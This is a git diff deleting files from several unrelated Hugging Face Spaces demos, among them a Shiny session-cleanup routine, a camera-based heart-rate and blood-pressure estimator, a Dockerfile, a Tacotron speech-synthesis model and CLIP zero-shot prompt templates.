- def close_every_ui_after_reset(): - ui.remove_ui("#correlation-plot") - ui.update_switch("view_correlation", value=False) - - ui.remove_ui("#var-imp-dec-tree-plot") - ui.update_switch("view_variable_importance_dec_tree", value=False) - - ui.remove_ui("#dec-tree-conf-mat-train") - ui.remove_ui("#dec-tree-conf-mat-test") - ui.update_switch("conf_mat_dec_tree_switch", value=False) - - ui.remove_ui("#dec-tree-view-img") - ui.update_switch("view_tree_dec_tree_switch", value=False) - - ui.remove_ui("#var-imp-ran-forest-plot") - ui.update_switch("view_variable_importance_ran_forest", value=False) - - ui.remove_ui("#ran-forest-conf-mat-train") - ui.remove_ui("#ran-forest-conf-mat-test") - ui.update_switch("conf_mat_ran_forest_switch", value=False) - - ui.remove_ui("#ran-forest-view-img") - ui.remove_ui("#ran-forest-view-img-foot") - ui.update_switch("view_tree_ran_forest_switch", value=False) - - ui.remove_ui("#var-imp-log-reg-plot") - ui.update_switch("view_variable_importance_log_reg", value=False) - - ui.remove_ui("#log-reg-conf-mat-train") - ui.remove_ui("#log-reg-conf-mat-test") - ui.update_switch("conf_mat_log_reg_switch", value=False) - - # Resetear manualmente el select del número de árbol a mostrar de random forest - ui.update_select("view_tree_ran_forest_number", choices=empty_column_dict), - - def resetAndDeleteEverything(): - delete_imgs_from_disk() - reset_dataframes_if_changed() - - # RESETEAR DATAFRAMES NECESARIAS (POR SI SE HA REALIZADO UNA RECARGA DE LA PÁGINA) - def reset_dataframes_if_changed(): - if len(original_df.columns) != len(clean_df.columns) or ( clean_df["diagnosis"][0] == 1 or clean_df["diagnosis"][0] == 0 ): - reset_clean_df() - - # Vaciar las tablas de importancia de variables si es necesario - empty_all_feature_importance_df() - - # BORRAR LAS IMÁGENES GUARDADAS EN DISCO (USADO AL CERRAR SESIÓN) - def delete_imgs_from_disk(): - img_dec_tree_path = str(decTree_image_folder) + "\\" + str(session.id) + "_dec_tree.jpg" - Path(img_dec_tree_path).unlink(missing_ok=True) - - img_custom_dec_tree_path = str(decTree_image_folder) + "\\" + str(session.id) + "custom_dec_tree.jpg" - Path(img_custom_dec_tree_path).unlink(missing_ok=True) - - for index in range(5): - img_ran_forest_path = str(ranForest_image_folder) + "\\" + str(session.id) + '_ran_forest' + str(index) + '.jpg' - Path(img_ran_forest_path).unlink(missing_ok=True) - - img_custom_ran_forest_path = str(ranForest_image_folder) + "\\" + str(session.id) + 'custom_ran_forest' + str(index) + '.jpg' - Path(img_custom_ran_forest_path).unlink(missing_ok=True) - - return - - # LLAMAR A LA FUNCIÓN QUE RESETEE Y LIMPIE LOS DATOS DEL DISCO AL CERRAR UNA SESIÓN - session.on_ended(resetAndDeleteEverything) - \ No newline at end of file diff --git a/spaces/Juliojuse/human_health_gradio/code/physiological_indicators.py b/spaces/Juliojuse/human_health_gradio/code/physiological_indicators.py deleted file mode 100644 index 28750a03fdd28dec022c79c254f3a719893fb3f4..0000000000000000000000000000000000000000 --- a/spaces/Juliojuse/human_health_gradio/code/physiological_indicators.py +++ /dev/null @@ -1,106 +0,0 @@ -from utils_sig import * -import joblib -import numpy as np -from lightgbm import LGBMRegressor - -import heartpy as hp -import scipy.signal as sig - -class PhysiologicalIndicators: - def __init__(self): - self.heart_rate = 0 - self.respiratory_rate = 0 - self.heart_rate_variability = 0 - self.SpO2 = 0 - self.blood_pressure = 0 - - def calculate_heart_rate(self, ippg_data, fps): - # 计算心率的代码 - print("HR processing") - self.heart_rate, self.respiratory_rate = hr_fft_2(ippg_data, fps) - # ippg = butter_bandpass(ippg_data, lowcut=0.6, highcut=4, fs=fps) - # self.heart_rate, psd_y, psd_x = hr_fft(ippg, fs=fps) - print("HR done") - return self.heart_rate, self.respiratory_rate - - def calculate_heart_rate_variability(self, ippg_data, fps): - # 计算心率变异性的代码 - # TODO: 实现心率变异性计算 - self.heart_rate_variability = calculate_hrv(ippg_data, fps) - return self.heart_rate_variability - - def calculate_SpO2(self, ROI_list, ROI2_list): - # 计算血氧饱和度的代码 - # TODO: 实现血氧饱和度计算 - ROI1_SpO2 = RGB_SpO2(ROI_list) - ROI2_SpO2 = RGB_SpO2(ROI2_list) - self.SpO2 = (ROI1_SpO2 + ROI2_SpO2) / 2 - return self.SpO2 - - def calculate_blood_pressure(self, ippg_data): - # 计算血压的代码 - ippg_data = np.array(ippg_data).reshape(len(ippg_data),1) - - bp_pred = [] - model_list = joblib.load( './code/model_weight/lgb_model_ppg2bp.pkl') - for model in model_list: - result = model.predict(ippg_data) - bp_pred.append(result+10) - bp_list = np.mean(bp_pred, axis=0) - return bp_list,np.max(bp_list),np.min(bp_list)-15 - - def calculate_HR(self, ROI_list, ROI2_list): - # 计算HR的代码 - ROI1_HR = RGB_HR(ROI_list) - ROI2_HR = RGB_HR(ROI2_list) - print("ROI1_HR",ROI1_HR,"ROI2_HR",ROI2_HR) - HR = (ROI1_HR + ROI2_HR) / 2 - return HR - - - # 定义一个函数来计算心率 - def calculate_heart_rate_2(self,ppg_signal, sampling_rate): - # 使用巴特沃斯滤波器处理信号,去除噪声 - nyquist_frequency = sampling_rate / 2.0 - low_cutoff_frequency = 0.5 - high_cutoff_frequency = 5.0 - filter_order = 2 - - b, a = sig.butter(filter_order, [low_cutoff_frequency/nyquist_frequency, high_cutoff_frequency/nyquist_frequency], btype='band') - filtered_signal = sig.filtfilt(b, a, ppg_signal) - - # 计算心率 - window_length = int(sampling_rate * 0.75) - step_size = int(sampling_rate * 0.1) - threshold = 0.4 - - # 使用峰值检测算法来找到脉冲峰值 - peak_indexes, _ = sig.find_peaks(filtered_signal, distance=10) - print("============================",peak_indexes,sampling_rate) - # 计算时间间隔并计算心率 - # time_intervals = np.diff(peak_indexes) / float(sampling_rate) - time_intervals = np.diff(peak_indexes) * 0.045 - heart_rate = 60.0 / np.mean(time_intervals) - - return heart_rate - - # 定义一个函数来从rppg信号中计算心率 - def calculate_heart_rate_3(self,signal): - wd, m = hp.process(signal, sample_rate = 100.0) - - return wd, m - - - - # def calculate_SPO2(self, ippg_chanel_data): - # # 计算血氧的代码 - # ippg_chanel_data = np.array(ippg_chanel_data).reshape(len(ippg_chanel_data),6) - - # SPO2_pred = [] - # model_list = joblib.load( './model_weight/lgb_model_threechanel2spo2.pkl') - # for model in model_list: - # result = model.predict(ippg_chanel_data) - # SPO2_pred.append(result) - # SPO2_list = np.mean(SPO2_pred, axis=0) - # return SPO2_list - diff --git a/spaces/JunghunleePhD/testfordocker/Dockerfile b/spaces/JunghunleePhD/testfordocker/Dockerfile deleted file mode 100644 index f40da5ecc4dbec04dfc90421bee92e022549f438..0000000000000000000000000000000000000000 --- a/spaces/JunghunleePhD/testfordocker/Dockerfile +++ /dev/null @@ -1,11 +0,0 @@ -FROM python:3.9 - -WORKDIR /app - -COPY ./app/requirements.txt /app/requirements.txt - -RUN pip install --no-cache-dir --upgrade -r /app/requirements.txt - -COPY . . - -CMD ["uvicorn", "app.main:app", "--reload", "--host", "0.0.0.0", "--port", "7860"] diff --git a/spaces/KAIST-Geometric-AI-Lab/salad-demo/salad/spaghetti/constants.py b/spaces/KAIST-Geometric-AI-Lab/salad-demo/salad/spaghetti/constants.py deleted file mode 100644 index 06f64c4c1846c6e185a0524d07c857544f868dde..0000000000000000000000000000000000000000 --- a/spaces/KAIST-Geometric-AI-Lab/salad-demo/salad/spaghetti/constants.py +++ /dev/null @@ -1,22 +0,0 @@ -import os -from pathlib import Path -import sys -from salad.utils.paths import SPAGHETTI_DIR - -IS_WINDOWS = sys.platform == 'win32' -get_trace = getattr(sys, 'gettrace', None) -DEBUG = get_trace is not None and get_trace() is not None -EPSILON = 1e-4 -DIM = 3 -# PROJECT_ROOT = str(Path(os.path.realpath(__file__)).parents[0]) -PROJECT_ROOT = str(SPAGHETTI_DIR) -DATA_ROOT = f'{PROJECT_ROOT}/assets/' -CHECKPOINTS_ROOT = f'{DATA_ROOT}checkpoints/' -CACHE_ROOT = f'{DATA_ROOT}cache/' -UI_OUT = f'{DATA_ROOT}ui_export/' -UI_RESOURCES = f'{DATA_ROOT}/ui_resources/' -Shapenet_WT = f'{DATA_ROOT}/ShapeNetCore_wt/' -Shapenet = f'{DATA_ROOT}/ShapeNetCore.v2/' -MAX_VS = 100000 -MAX_GAUSIANS = 32 - diff --git a/spaces/Kangarroar/ApplioRVC-Inference/Applio-RVC-Fork/utils/i18n.py b/spaces/Kangarroar/ApplioRVC-Inference/Applio-RVC-Fork/utils/i18n.py deleted file mode 100644 index 8e75d2bc26ff86ab1716b8d7f239ad9f5cc1e32d..0000000000000000000000000000000000000000 --- a/spaces/Kangarroar/ApplioRVC-Inference/Applio-RVC-Fork/utils/i18n.py +++ /dev/null @@ -1,28 +0,0 @@ -import locale -import json -import os - - -def load_language_list(language): - with open(f"./i18n/{language}.json", "r", encoding="utf-8") as f: - language_list = json.load(f) - return language_list - - -class I18nAuto: - def __init__(self, language=None): - if language in ["Auto", None]: - language = "es_ES" - if not os.path.exists(f"./i18n/{language}.json"): - language = "es_ES" - language = "es_ES" - self.language = language - # print("Use Language:", language) - self.language_map = load_language_list(language) - - def __call__(self, key): - return self.language_map.get(key, key) - - def print(self): - # print("Use Language:", self.language) - print("") diff --git a/spaces/Katyyy/text_generator/app.py b/spaces/Katyyy/text_generator/app.py deleted file mode 100644 index 96d20ef5b60cd0ea1d6917014dc18215fce042e3..0000000000000000000000000000000000000000 --- a/spaces/Katyyy/text_generator/app.py +++ /dev/null @@ -1,12 +0,0 @@ -import gradio as gr -from gradio.mix import Parallel - -myfirstvariable="My First Text Generator" -mylovelysecondvariable="Input text and submit." - -model1=gr.Interface.load("huggingface/gpt2") -model2=gr.Interface.load("huggingface/EleutherAI/gpt-neo-1.3B") -model3=gr.Interface.load("huggingface/bigscience/bloom-560m") - - -gr.Parallel(model1, model2, model3, title=myfirstvariable, description=mylovelysecondvariable).launch() \ No newline at end of file diff --git a/spaces/Kevin676/Clone-Your-Voice/synthesizer/models/tacotron.py b/spaces/Kevin676/Clone-Your-Voice/synthesizer/models/tacotron.py deleted file mode 100644 index 769f7f98b79100ff587af3609010dd55e3b2a146..0000000000000000000000000000000000000000 --- a/spaces/Kevin676/Clone-Your-Voice/synthesizer/models/tacotron.py +++ /dev/null @@ -1,519 +0,0 @@ -import os -import numpy as np -import torch -import torch.nn as nn -import torch.nn.functional as F -from pathlib import Path -from typing import Union - - -class HighwayNetwork(nn.Module): - def __init__(self, size): - super().__init__() - self.W1 = nn.Linear(size, size) - self.W2 = nn.Linear(size, size) - self.W1.bias.data.fill_(0.) - - def forward(self, x): - x1 = self.W1(x) - x2 = self.W2(x) - g = torch.sigmoid(x2) - y = g * F.relu(x1) + (1. - g) * x - return y - - -class Encoder(nn.Module): - def __init__(self, embed_dims, num_chars, encoder_dims, K, num_highways, dropout): - super().__init__() - prenet_dims = (encoder_dims, encoder_dims) - cbhg_channels = encoder_dims - self.embedding = nn.Embedding(num_chars, embed_dims) - self.pre_net = PreNet(embed_dims, fc1_dims=prenet_dims[0], fc2_dims=prenet_dims[1], - dropout=dropout) - self.cbhg = CBHG(K=K, in_channels=cbhg_channels, channels=cbhg_channels, - proj_channels=[cbhg_channels, cbhg_channels], - num_highways=num_highways) - - def forward(self, x, speaker_embedding=None): - x = self.embedding(x) - x = self.pre_net(x) - x.transpose_(1, 2) - x = self.cbhg(x) - if speaker_embedding is not None: - x = self.add_speaker_embedding(x, speaker_embedding) - return x - - def add_speaker_embedding(self, x, speaker_embedding): - # SV2TTS - # The input x is the encoder output and is a 3D tensor with size (batch_size, num_chars, tts_embed_dims) - # When training, speaker_embedding is also a 2D tensor with size (batch_size, speaker_embedding_size) - # (for inference, speaker_embedding is a 1D tensor with size (speaker_embedding_size)) - # This concats the speaker embedding for each char in the encoder output - - # Save the dimensions as human-readable names - batch_size = x.size()[0] - num_chars = x.size()[1] - - if speaker_embedding.dim() == 1: - idx = 0 - else: - idx = 1 - - # Start by making a copy of each speaker embedding to match the input text length - # The output of this has size (batch_size, num_chars * tts_embed_dims) - speaker_embedding_size = speaker_embedding.size()[idx] - e = speaker_embedding.repeat_interleave(num_chars, dim=idx) - - # Reshape it and transpose - e = e.reshape(batch_size, speaker_embedding_size, num_chars) - e = e.transpose(1, 2) - - # Concatenate the tiled speaker embedding with the encoder output - x = torch.cat((x, e), 2) - return x - - -class BatchNormConv(nn.Module): - def __init__(self, in_channels, out_channels, kernel, relu=True): - super().__init__() - self.conv = nn.Conv1d(in_channels, out_channels, kernel, stride=1, padding=kernel // 2, bias=False) - self.bnorm = nn.BatchNorm1d(out_channels) - self.relu = relu - - def forward(self, x): - x = self.conv(x) - x = F.relu(x) if self.relu is True else x - return self.bnorm(x) - - -class CBHG(nn.Module): - def __init__(self, K, in_channels, channels, proj_channels, num_highways): - super().__init__() - - # List of all rnns to call `flatten_parameters()` on - self._to_flatten = [] - - self.bank_kernels = [i for i in range(1, K + 1)] - self.conv1d_bank = nn.ModuleList() - for k in self.bank_kernels: - conv = BatchNormConv(in_channels, channels, k) - self.conv1d_bank.append(conv) - - self.maxpool = nn.MaxPool1d(kernel_size=2, stride=1, padding=1) - - self.conv_project1 = BatchNormConv(len(self.bank_kernels) * channels, proj_channels[0], 3) - self.conv_project2 = BatchNormConv(proj_channels[0], proj_channels[1], 3, relu=False) - - # Fix the highway input if necessary - if proj_channels[-1] != channels: - self.highway_mismatch = True - self.pre_highway = nn.Linear(proj_channels[-1], channels, bias=False) - else: - self.highway_mismatch = False - - self.highways = nn.ModuleList() - for i in range(num_highways): - hn = HighwayNetwork(channels) - self.highways.append(hn) - - self.rnn = nn.GRU(channels, channels // 2, batch_first=True, bidirectional=True) - self._to_flatten.append(self.rnn) - - # Avoid fragmentation of RNN parameters and associated warning - self._flatten_parameters() - - def forward(self, x): - # Although we `_flatten_parameters()` on init, when using DataParallel - # the model gets replicated, making it no longer guaranteed that the - # weights are contiguous in GPU memory. Hence, we must call it again - self._flatten_parameters() - - # Save these for later - residual = x - seq_len = x.size(-1) - conv_bank = [] - - # Convolution Bank - for conv in self.conv1d_bank: - c = conv(x) # Convolution - conv_bank.append(c[:, :, :seq_len]) - - # Stack along the channel axis - conv_bank = torch.cat(conv_bank, dim=1) - - # dump the last padding to fit residual - x = self.maxpool(conv_bank)[:, :, :seq_len] - - # Conv1d projections - x = self.conv_project1(x) - x = self.conv_project2(x) - - # Residual Connect - x = x + residual - - # Through the highways - x = x.transpose(1, 2) - if self.highway_mismatch is True: - x = self.pre_highway(x) - for h in self.highways: x = h(x) - - # And then the RNN - x, _ = self.rnn(x) - return x - - def _flatten_parameters(self): - """Calls `flatten_parameters` on all the rnns used by the WaveRNN. Used - to improve efficiency and avoid PyTorch yelling at us.""" - [m.flatten_parameters() for m in self._to_flatten] - -class PreNet(nn.Module): - def __init__(self, in_dims, fc1_dims=256, fc2_dims=128, dropout=0.5): - super().__init__() - self.fc1 = nn.Linear(in_dims, fc1_dims) - self.fc2 = nn.Linear(fc1_dims, fc2_dims) - self.p = dropout - - def forward(self, x): - x = self.fc1(x) - x = F.relu(x) - x = F.dropout(x, self.p, training=True) - x = self.fc2(x) - x = F.relu(x) - x = F.dropout(x, self.p, training=True) - return x - - -class Attention(nn.Module): - def __init__(self, attn_dims): - super().__init__() - self.W = nn.Linear(attn_dims, attn_dims, bias=False) - self.v = nn.Linear(attn_dims, 1, bias=False) - - def forward(self, encoder_seq_proj, query, t): - - # print(encoder_seq_proj.shape) - # Transform the query vector - query_proj = self.W(query).unsqueeze(1) - - # Compute the scores - u = self.v(torch.tanh(encoder_seq_proj + query_proj)) - scores = F.softmax(u, dim=1) - - return scores.transpose(1, 2) - - -class LSA(nn.Module): - def __init__(self, attn_dim, kernel_size=31, filters=32): - super().__init__() - self.conv = nn.Conv1d(1, filters, padding=(kernel_size - 1) // 2, kernel_size=kernel_size, bias=True) - self.L = nn.Linear(filters, attn_dim, bias=False) - self.W = nn.Linear(attn_dim, attn_dim, bias=True) # Include the attention bias in this term - self.v = nn.Linear(attn_dim, 1, bias=False) - self.cumulative = None - self.attention = None - - def init_attention(self, encoder_seq_proj): - device = next(self.parameters()).device # use same device as parameters - b, t, c = encoder_seq_proj.size() - self.cumulative = torch.zeros(b, t, device=device) - self.attention = torch.zeros(b, t, device=device) - - def forward(self, encoder_seq_proj, query, t, chars): - - if t == 0: self.init_attention(encoder_seq_proj) - - processed_query = self.W(query).unsqueeze(1) - - location = self.cumulative.unsqueeze(1) - processed_loc = self.L(self.conv(location).transpose(1, 2)) - - u = self.v(torch.tanh(processed_query + encoder_seq_proj + processed_loc)) - u = u.squeeze(-1) - - # Mask zero padding chars - u = u * (chars != 0).float() - - # Smooth Attention - # scores = torch.sigmoid(u) / torch.sigmoid(u).sum(dim=1, keepdim=True) - scores = F.softmax(u, dim=1) - self.attention = scores - self.cumulative = self.cumulative + self.attention - - return scores.unsqueeze(-1).transpose(1, 2) - - -class Decoder(nn.Module): - # Class variable because its value doesn't change between classes - # yet ought to be scoped by class because its a property of a Decoder - max_r = 20 - def __init__(self, n_mels, encoder_dims, decoder_dims, lstm_dims, - dropout, speaker_embedding_size): - super().__init__() - self.register_buffer("r", torch.tensor(1, dtype=torch.int)) - self.n_mels = n_mels - prenet_dims = (decoder_dims * 2, decoder_dims * 2) - self.prenet = PreNet(n_mels, fc1_dims=prenet_dims[0], fc2_dims=prenet_dims[1], - dropout=dropout) - self.attn_net = LSA(decoder_dims) - self.attn_rnn = nn.GRUCell(encoder_dims + prenet_dims[1] + speaker_embedding_size, decoder_dims) - self.rnn_input = nn.Linear(encoder_dims + decoder_dims + speaker_embedding_size, lstm_dims) - self.res_rnn1 = nn.LSTMCell(lstm_dims, lstm_dims) - self.res_rnn2 = nn.LSTMCell(lstm_dims, lstm_dims) - self.mel_proj = nn.Linear(lstm_dims, n_mels * self.max_r, bias=False) - self.stop_proj = nn.Linear(encoder_dims + speaker_embedding_size + lstm_dims, 1) - - def zoneout(self, prev, current, p=0.1): - device = next(self.parameters()).device # Use same device as parameters - mask = torch.zeros(prev.size(), device=device).bernoulli_(p) - return prev * mask + current * (1 - mask) - - def forward(self, encoder_seq, encoder_seq_proj, prenet_in, - hidden_states, cell_states, context_vec, t, chars): - - # Need this for reshaping mels - batch_size = encoder_seq.size(0) - - # Unpack the hidden and cell states - attn_hidden, rnn1_hidden, rnn2_hidden = hidden_states - rnn1_cell, rnn2_cell = cell_states - - # PreNet for the Attention RNN - prenet_out = self.prenet(prenet_in) - - # Compute the Attention RNN hidden state - attn_rnn_in = torch.cat([context_vec, prenet_out], dim=-1) - attn_hidden = self.attn_rnn(attn_rnn_in.squeeze(1), attn_hidden) - - # Compute the attention scores - scores = self.attn_net(encoder_seq_proj, attn_hidden, t, chars) - - # Dot product to create the context vector - context_vec = scores @ encoder_seq - context_vec = context_vec.squeeze(1) - - # Concat Attention RNN output w. Context Vector & project - x = torch.cat([context_vec, attn_hidden], dim=1) - x = self.rnn_input(x) - - # Compute first Residual RNN - rnn1_hidden_next, rnn1_cell = self.res_rnn1(x, (rnn1_hidden, rnn1_cell)) - if self.training: - rnn1_hidden = self.zoneout(rnn1_hidden, rnn1_hidden_next) - else: - rnn1_hidden = rnn1_hidden_next - x = x + rnn1_hidden - - # Compute second Residual RNN - rnn2_hidden_next, rnn2_cell = self.res_rnn2(x, (rnn2_hidden, rnn2_cell)) - if self.training: - rnn2_hidden = self.zoneout(rnn2_hidden, rnn2_hidden_next) - else: - rnn2_hidden = rnn2_hidden_next - x = x + rnn2_hidden - - # Project Mels - mels = self.mel_proj(x) - mels = mels.view(batch_size, self.n_mels, self.max_r)[:, :, :self.r] - hidden_states = (attn_hidden, rnn1_hidden, rnn2_hidden) - cell_states = (rnn1_cell, rnn2_cell) - - # Stop token prediction - s = torch.cat((x, context_vec), dim=1) - s = self.stop_proj(s) - stop_tokens = torch.sigmoid(s) - - return mels, scores, hidden_states, cell_states, context_vec, stop_tokens - - -class Tacotron(nn.Module): - def __init__(self, embed_dims, num_chars, encoder_dims, decoder_dims, n_mels, - fft_bins, postnet_dims, encoder_K, lstm_dims, postnet_K, num_highways, - dropout, stop_threshold, speaker_embedding_size): - super().__init__() - self.n_mels = n_mels - self.lstm_dims = lstm_dims - self.encoder_dims = encoder_dims - self.decoder_dims = decoder_dims - self.speaker_embedding_size = speaker_embedding_size - self.encoder = Encoder(embed_dims, num_chars, encoder_dims, - encoder_K, num_highways, dropout) - self.encoder_proj = nn.Linear(encoder_dims + speaker_embedding_size, decoder_dims, bias=False) - self.decoder = Decoder(n_mels, encoder_dims, decoder_dims, lstm_dims, - dropout, speaker_embedding_size) - self.postnet = CBHG(postnet_K, n_mels, postnet_dims, - [postnet_dims, fft_bins], num_highways) - self.post_proj = nn.Linear(postnet_dims, fft_bins, bias=False) - - self.init_model() - self.num_params() - - self.register_buffer("step", torch.zeros(1, dtype=torch.long)) - self.register_buffer("stop_threshold", torch.tensor(stop_threshold, dtype=torch.float32)) - - @property - def r(self): - return self.decoder.r.item() - - @r.setter - def r(self, value): - self.decoder.r = self.decoder.r.new_tensor(value, requires_grad=False) - - def forward(self, x, m, speaker_embedding): - device = next(self.parameters()).device # use same device as parameters - - self.step += 1 - batch_size, _, steps = m.size() - - # Initialise all hidden states and pack into tuple - attn_hidden = torch.zeros(batch_size, self.decoder_dims, device=device) - rnn1_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) - rnn2_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) - hidden_states = (attn_hidden, rnn1_hidden, rnn2_hidden) - - # Initialise all lstm cell states and pack into tuple - rnn1_cell = torch.zeros(batch_size, self.lstm_dims, device=device) - rnn2_cell = torch.zeros(batch_size, self.lstm_dims, device=device) - cell_states = (rnn1_cell, rnn2_cell) - - # Frame for start of decoder loop - go_frame = torch.zeros(batch_size, self.n_mels, device=device) - - # Need an initial context vector - context_vec = torch.zeros(batch_size, self.encoder_dims + self.speaker_embedding_size, device=device) - - # SV2TTS: Run the encoder with the speaker embedding - # The projection avoids unnecessary matmuls in the decoder loop - encoder_seq = self.encoder(x, speaker_embedding) - encoder_seq_proj = self.encoder_proj(encoder_seq) - - # Need a couple of lists for outputs - mel_outputs, attn_scores, stop_outputs = [], [], [] - - # Run the decoder loop - for t in range(0, steps, self.r): - prenet_in = m[:, :, t - 1] if t > 0 else go_frame - mel_frames, scores, hidden_states, cell_states, context_vec, stop_tokens = \ - self.decoder(encoder_seq, encoder_seq_proj, prenet_in, - hidden_states, cell_states, context_vec, t, x) - mel_outputs.append(mel_frames) - attn_scores.append(scores) - stop_outputs.extend([stop_tokens] * self.r) - - # Concat the mel outputs into sequence - mel_outputs = torch.cat(mel_outputs, dim=2) - - # Post-Process for Linear Spectrograms - postnet_out = self.postnet(mel_outputs) - linear = self.post_proj(postnet_out) - linear = linear.transpose(1, 2) - - # For easy visualisation - attn_scores = torch.cat(attn_scores, 1) - # attn_scores = attn_scores.cpu().data.numpy() - stop_outputs = torch.cat(stop_outputs, 1) - - return mel_outputs, linear, attn_scores, stop_outputs - - def generate(self, x, speaker_embedding=None, steps=2000): - self.eval() - device = next(self.parameters()).device # use same device as parameters - - batch_size, _ = x.size() - - # Need to initialise all hidden states and pack into tuple for tidyness - attn_hidden = torch.zeros(batch_size, self.decoder_dims, device=device) - rnn1_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) - rnn2_hidden = torch.zeros(batch_size, self.lstm_dims, device=device) - hidden_states = (attn_hidden, rnn1_hidden, rnn2_hidden) - - # Need to initialise all lstm cell states and pack into tuple for tidyness - rnn1_cell = torch.zeros(batch_size, self.lstm_dims, device=device) - rnn2_cell = torch.zeros(batch_size, self.lstm_dims, device=device) - cell_states = (rnn1_cell, rnn2_cell) - - # Need a Frame for start of decoder loop - go_frame = torch.zeros(batch_size, self.n_mels, device=device) - - # Need an initial context vector - context_vec = torch.zeros(batch_size, self.encoder_dims + self.speaker_embedding_size, device=device) - - # SV2TTS: Run the encoder with the speaker embedding - # The projection avoids unnecessary matmuls in the decoder loop - encoder_seq = self.encoder(x, speaker_embedding) - encoder_seq_proj = self.encoder_proj(encoder_seq) - - # Need a couple of lists for outputs - mel_outputs, attn_scores, stop_outputs = [], [], [] - - # Run the decoder loop - for t in range(0, steps, self.r): - prenet_in = mel_outputs[-1][:, :, -1] if t > 0 else go_frame - mel_frames, scores, hidden_states, cell_states, context_vec, stop_tokens = \ - self.decoder(encoder_seq, encoder_seq_proj, prenet_in, - hidden_states, cell_states, context_vec, t, x) - mel_outputs.append(mel_frames) - attn_scores.append(scores) - stop_outputs.extend([stop_tokens] * self.r) - # Stop the loop when all stop tokens in batch exceed threshold - if (stop_tokens > 0.5).all() and t > 10: break - - # Concat the mel outputs into sequence - mel_outputs = torch.cat(mel_outputs, dim=2) - - # Post-Process for Linear Spectrograms - postnet_out = self.postnet(mel_outputs) - linear = self.post_proj(postnet_out) - - - linear = linear.transpose(1, 2) - - # For easy visualisation - attn_scores = torch.cat(attn_scores, 1) - stop_outputs = torch.cat(stop_outputs, 1) - - self.train() - - return mel_outputs, linear, attn_scores - - def init_model(self): - for p in self.parameters(): - if p.dim() > 1: nn.init.xavier_uniform_(p) - - def get_step(self): - return self.step.data.item() - - def reset_step(self): - # assignment to parameters or buffers is overloaded, updates internal dict entry - self.step = self.step.data.new_tensor(1) - - def log(self, path, msg): - with open(path, "a") as f: - print(msg, file=f) - - def load(self, path, optimizer=None): - # Use device of model params as location for loaded state - device = next(self.parameters()).device - checkpoint = torch.load(str(path), map_location=device) - self.load_state_dict(checkpoint["model_state"]) - - if "optimizer_state" in checkpoint and optimizer is not None: - optimizer.load_state_dict(checkpoint["optimizer_state"]) - - def save(self, path, optimizer=None): - if optimizer is not None: - torch.save({ - "model_state": self.state_dict(), - "optimizer_state": optimizer.state_dict(), - }, str(path)) - else: - torch.save({ - "model_state": self.state_dict(), - }, str(path)) - - - def num_params(self, print_out=True): - parameters = filter(lambda p: p.requires_grad, self.parameters()) - parameters = sum([np.prod(p.size()) for p in parameters]) / 1_000_000 - if print_out: - print("Trainable Parameters: %.3fM" % parameters) - return parameters diff --git a/spaces/LanguageBind/LanguageBind/open_clip/zero_shot_metadata.py b/spaces/LanguageBind/LanguageBind/open_clip/zero_shot_metadata.py deleted file mode 100644 index ccb452bbb6e27b71cff1dd27e2bb263259b9363f..0000000000000000000000000000000000000000 --- a/spaces/LanguageBind/LanguageBind/open_clip/zero_shot_metadata.py +++ /dev/null @@ -1,266 +0,0 @@ - -OPENAI_IMAGENET_TEMPLATES = ( - lambda c: f'a bad photo of a {c}.', - lambda c: f'a photo of many {c}.', - lambda c: f'a sculpture of a {c}.', - lambda c: f'a photo of the hard to see {c}.', - lambda c: f'a low resolution photo of the {c}.', - lambda c: f'a rendering of a {c}.', - lambda c: f'graffiti of a {c}.', - lambda c: f'a bad photo of the {c}.', - lambda c: f'a cropped photo of the {c}.', - lambda c: f'a tattoo of a {c}.', - lambda c: f'the embroidered {c}.', - lambda c: f'a photo of a hard to see {c}.', - lambda c: f'a bright photo of a {c}.', - lambda c: f'a photo of a clean {c}.', - lambda c: f'a photo of a dirty {c}.', - lambda c: f'a dark photo of the {c}.', - lambda c: f'a drawing of a {c}.', - lambda c: f'a photo of my {c}.', - lambda c: f'the plastic {c}.', - lambda c: f'a photo of the cool {c}.', - lambda c: f'a close-up photo of a {c}.', - lambda c: f'a black and white photo of the {c}.', - lambda c: f'a painting of the {c}.', - lambda c: f'a painting of a {c}.', - lambda c: f'a pixelated photo of the {c}.', - lambda c: f'a sculpture of the {c}.', - lambda c: f'a bright photo of the {c}.', - lambda c: f'a cropped photo of a {c}.', - lambda c: f'a plastic {c}.', - lambda c: f'a photo of the dirty {c}.', - lambda c: f'a jpeg corrupted photo of a {c}.', - lambda c: f'a blurry photo of the {c}.', - lambda c: f'a photo of the {c}.', - lambda c: f'a good photo of the {c}.', - lambda c: f'a rendering of the {c}.', - lambda c: f'a {c} in a video game.', - lambda c: f'a photo of one {c}.', - lambda c: f'a doodle of a {c}.', - lambda c: f'a close-up photo of the {c}.', - lambda c: f'a photo of a {c}.', - lambda c: f'the origami {c}.', - lambda c: f'the {c} in a video game.', - lambda c: f'a sketch of a {c}.', - lambda c: f'a doodle of the {c}.', - lambda c: f'a origami {c}.', - lambda c: f'a low resolution photo of a {c}.', - lambda c: f'the toy {c}.', - lambda c: f'a rendition of the {c}.', - lambda c: f'a photo of the clean {c}.', - lambda c: f'a photo of a large {c}.', - lambda c: f'a rendition of a {c}.', - lambda c: f'a photo of a nice {c}.', - lambda c: f'a photo of a weird {c}.', - lambda c: f'a blurry photo of a {c}.', - lambda c: f'a cartoon {c}.', - lambda c: f'art of a {c}.', - lambda c: f'a sketch of the {c}.', - lambda c: f'a embroidered {c}.', - lambda c: f'a pixelated photo of a {c}.', - lambda c: f'itap of the {c}.', - lambda c: f'a jpeg corrupted photo of the {c}.', - lambda c: f'a good photo of a {c}.', - lambda c: f'a plushie {c}.', - lambda c: f'a photo of the nice {c}.', - lambda c: f'a photo of the small {c}.', - lambda c: f'a photo of the weird {c}.', - lambda c: f'the cartoon {c}.', - lambda c: f'art of the {c}.', - lambda c: f'a drawing of the {c}.', - lambda c: f'a photo of the large {c}.', - lambda c: f'a black and white photo of a {c}.', - lambda c: f'the plushie {c}.', - lambda c: f'a dark photo of a {c}.', - lambda c: f'itap of a {c}.', - lambda c: f'graffiti of the {c}.', - lambda c: f'a toy {c}.', - lambda c: f'itap of my {c}.', - lambda c: f'a photo of a cool {c}.', - lambda c: f'a photo of a small {c}.', - lambda c: f'a tattoo of the {c}.', -) - - -# a much smaller subset of above prompts -# from https://github.com/openai/CLIP/blob/main/notebooks/Prompt_Engineering_for_ImageNet.ipynb 